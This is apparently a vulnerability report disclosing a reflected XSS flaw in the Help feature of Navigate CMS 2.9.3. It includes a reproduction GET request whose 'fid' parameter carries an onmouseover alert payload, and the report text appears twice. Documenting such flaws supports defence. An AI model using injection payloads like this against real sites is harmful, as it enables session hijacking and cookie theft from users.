EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the Help feature.
IMPACT
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
VULNERABILITY CODE
I found the vulnerability code is in \lib\layout\layout.class.php
STEPS TO REPRODUCE
We change the request
GET /navigate-2.9.3r1525/navigate/navigate.php?fid=%22onmouseover%3d%22alert(%27xss%27)%22%3b%22&act=edit&id=&tab=0&tab_language=&form-sent=true&id=&date_to_display=2021-06-04+01%3a27&date_published=&date_unpublish=&access=0&permission=0&item-author=1&item-author-text=admin&association[]=category&category=&embedding[]=1&template=content
Log into your account
Then when people move the cursor to Help feature, the Reflected XSS is executed ( don’t need to click ).
EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the Help feature.
IMPACT Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
VULNERABILITY CODE I found the vulnerability code is in \lib\layout\layout.class.php
STEPS TO REPRODUCE
GET /navigate-2.9.3r1525/navigate/navigate.php?fid=%22onmouseover%3d%22alert(%27xss%27)%22%3b%22&act=edit&id=&tab=0&tab_language=&form-sent=true&id=&date_to_display=2021-06-04+01%3a27&date_published=&date_unpublish=&access=0&permission=0&item-author=1&item-author-text=admin&association[]=category&category=&embedding[]=1&template=content
Log into your account
Then when people move the cursor to Help feature, the Reflected XSS is executed ( don’t need to click ).